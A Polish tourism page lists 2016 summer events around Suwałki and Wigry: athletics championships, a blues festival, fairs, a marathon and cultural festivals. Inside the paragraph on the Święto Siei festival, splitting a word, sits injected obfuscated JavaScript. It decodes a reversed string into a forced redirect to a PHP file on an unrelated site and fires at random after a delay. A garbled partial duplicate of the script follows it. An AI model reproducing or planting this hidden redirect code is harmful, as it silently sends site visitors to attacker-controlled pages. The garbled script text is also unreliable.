Imprezy turystyczne na Suwalszczyźnie

Wybrane imprezy turystyczne odbywające się na Suwalszczyźnie, które serdecznie polecamy i zapraszamy.

MISTRZOSTWA POLSKI JUNIORÓW U20 W LEKKOATLETYCE W SUWAŁKACH (1-3 lipca 2016 r.) W lipcowy weekend w Suwałkach nad Czarną Hańczą odbędą się jubileuszowe 70 Mistrzostwa Polski Juniorów U20 w Lekkoatletyce.

W trakcie 3 dni sportowych zmagań zaprezentuje się około 1200 zawodników i zawodniczek z  Polski.  Wśród nich nie zabraknie „nadziei olimpijskich”. Na suwalskim stadionie pojawią się m.in. E. Swoboda, rekordzistka Polski w biegu na 60 m (czas 7,07 s) i Mistrzyni Europy Juniorów z Eskilstuny (2015) w biegu na 100 metrów, a także K. Bukowiecki, profesjonalizuje  się w rzucie dyskiem i pchnięciu kulą, Mistrz Świata Juniorów (Eugene 2014) i Mistrz Europy Juniorów (Eskilstuna 2015).

Zapraszamy do skorzystania z oferty noclegów  podmiotów działających w naszym stowarzyszeniu. Baza noclegowa i więcej informacji o wolnych pokojach na Mistrzostwa Polski w Lekkoatletyce na podstronie „Nasza Oferta”.

BLUES FESTIVAL SUWAŁKI (7-10 lipca 2016) – wówczas Suwałki są oblegane przez imprezowiczów, turystów oraz miejscowych, którzy oczekują występów bluesowych. Na koncertach można usłyszeć muzykę na żywo, w wykonaniu znanych artystów – muzyków. Festiwal bluesowy to szereg imprez muzycznych: warsztatów instrumentalnych, pokazów sprzętu muzycznego, prezentacje wydawnictw z płytami, spotkania z muzykami oraz wykłady o muzyce blues. Na scenie już występowały takie gwiazdy muzyczne jak Bob Dylan, Mick Taylor, Canned Heat i wiele innych.

ŚWIĘTO SIEI – Jest to tzw. „Piknik rodzinny”. Święto ryby Siei odbywa się w ogrodach wigierskich przy Klasztorze nad Wigrami.  Jest to impreza turystyczna, w których skład wchodzą dyskoteki, konkursy, pokazy Straży Pożarnej, pokazy rzemiosła i kuchni tradycyjnej, degustacja zupy rybnej, stoiska h $cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} andlowe z wyrobami regionalnymi, atrakcjami dla dzieci i wiele innych.

JARMARK WIGIERSKI, ODPUST W WIGRACH (15 sierpnia): Tradycyjne potrawy, sery, wędliny a także warsztaty garncarskie i tkackie – to tylko niektóre propozycje tradycyjnego Jarmarku Wigierskiego, który odbywa się w niedzielę podczas odpustu wigierskiego. Odpust ma miejsce, co roku w Święto katolickie Wniebowzięcia Najświętszej Marii Panny 15 sierpnia.  Temu wydarzeniu towarzyszą imprezy regionalne, pokazy, warsztaty, wystawy, degustacje, sprzedaż regionalnych wypieków oraz wędlin i serów. Całej imprezie towarzyszy oprawa muzyczna.  Tego dnia przyjeżdżają w to miejsce tłumy, ludzie z całej Polski. Również można korzystać wówczas z atrakcji wodnych oraz kąpielisk i rejsów statkiem.

MARATON WIGRY (20 sierpnia 2016) – Maraton biegowy, dzięki któremu odwiedzisz przepiękne miejsca. Trasa przeprowadzona w całości na terenie Wigierskiego Parku Narodowego, wokół Jeziora Wigry, w większości zielonym szlakiem pieszym.  Start maratonu przy Pokamedulskim Klasztorze Wigierskim, natomiast meta w Starym Folwarku gdzie jest mnóstwo kwater noclegowych. Szczególnie zapraszamy do skorzystania z pobliskich  kwater działających przy stowarzyszeniu. Więcej dostępnych noclegów na Maraton Wigry na podstronie „Nasza Oferta”

Trasa na dwóch dystansach:

  • MARATON WIGRY – ok 42 km wokół Jeziora Wigry – w znakomitej większości leśne ścieżki i drogi gruntowe, nieco asfaltu
  • POGOŃ ZA BOBREM – ok 13km – leśne ścieżki i drogi gruntowe

Kręte i wąskie ścieżki leśne nad samą linią brzegową jeziora, daleko wysunięte kładki na bagnach i szutrówki. Są to tzw. Zielone Płuca Polski.  Maraton jest też imprezą integracyjną dla dzieci i dorosłych, to wspaniała okazja do spędzenia niezapomnianego weekendu oraz doskonałego wypoczynku np. przed pracą, a także korzystanie w pełni z wymarzonej pogody i lata.  Wszelkie szczegółowe informacje można znaleźć na stronie internetowej www.maratonwigry.pl

JARMARK KAMEDULSKI – Prezydent Suwałk corocznie zaprasza wszystkich suwalczan i pozostałych gości na dwudniowe święto miasta w sierpniu. Dni Suwałk -„Jarmark Kamedulski” nawiązują do pierwszych jarmarków, organizowanych przez założycieli Suwałk, czyli kamedułów. W programie są przewidziane atrakcje dla rodzin – barwny korowód, widowiska plenerowe ukazujące historię naszego miasta, występy suwalskich gości i zespołów muzycznych oraz konkursy i zabawy dla najmłodszych uczestników. Zgodnie z tradycją w parku Konstytucji 3 Maja rozstawią się stoiska z rękodziełem i suwalskim jadłem. Będzie można skosztować “rożków Rocha”, “bułeczek kamedułek” i “rożków pustelniczych”. Po mieście będzie jeździła kolejka “Pogodnych Suwałk”.

XVI LETNIA FILHARMONIA AUKSO – W trakcie XVI Letniej Filharmonii AUKSO – W Wigrach i Suwalskim Ośrodku Kultury będzie można posłuchać fantastycznych koncertów oraz spotkać się z wyjątkowymi artystami. „XVI LETNIA FILHARMONIA AUKSO” to festiwal o szerokim spektrum kulturowym i artystycznym, odbywający się od kilkunastu lat na Suwalszczyźnie.

PŁYWANIE NA BYLE CZYM W AUGUSTOWIE – „Co ma pływać nie Utonie” Mistrzostwa Polski w Augustowie w Pływaniu na Byle Czym. Pływanie na byle czym to impreza organizowana corocznie od 1995 roku w Augustowie. Za miejsce przeprowadzenia tego konkursu wybrano  Kanał Augustowski nad Nettą. Pływanie na byle czym polega na zbudowaniu czegoś, co nie utonie, tylko utrzyma się na wodzie, ale będzie oryginalnie wyglądać i zaprezentowaniu go przed komisją. To nieziemsko interesujące i radosne przedstawienie na wodzie przyciąga do Augustowa tłumy fanów, corocznie odwiedzających tą imprezę. Tylu ludzi nie spotkamy tutaj w żaden inny dzień w sezonie wakacyjnym. Korzystając z tego faktu organizowane są także koncerty, którym patronuje “Studio Lato Radia Białystok”, więc atrakcji w ten dzień w Augustowie jest całe mnóstwo, a na koniec dnia możemy liczyć na najdłużej wyczekiwany występ gwiazdy wieczoru. Są także organizowane kilkunastominutowe pokazy sztucznych ogni.

WIGRASZEK – od ponad dziesięciu lat współtworzy kulturalny wizerunek naszego miasta. Jest imprezą popularyzującą młodzieżowy i dziecięcy ruch teatralny. Stwarza odbiorcom możliwość skonfrontowania ich dotychczasowych działań artystycznych, wymiany doświadczeń z warsztatów, sprzyja integracji młodszego pokolenia artystycznego i przybliża mieszkańcom naszego miasta, oddalonego od istotnych centrów kulturalnych, szanse ujrzenia wartościowych, godnych dostrzeżenia dokonań teatralnych uczestników.

Tradycją festiwalu są spotkania spektakle, spotkania kulturalno-edukacyjne związane z legendami i historią naszego regionu, organizowane w plenerach urokliwej Suwalszczyzny. Uczestnicy za każdym razem są przygotowani do odbioru i samodzielnego uczestnictwa w zaaranżowanej historii dotyczącej miejsc szczególnych na pograniczu polsko-litewsko-białoruskim. Spotkania te stanowią doskonałą okazję do zacieśnienia kontaktów i nowych znajomości, jednocześnie doskonałą okazję do otwarcia „pudełka zwanego wyobraźnią” i wznowienia pamięci o historii, której jesteśmy częścią. Przewidziane są występy taneczne.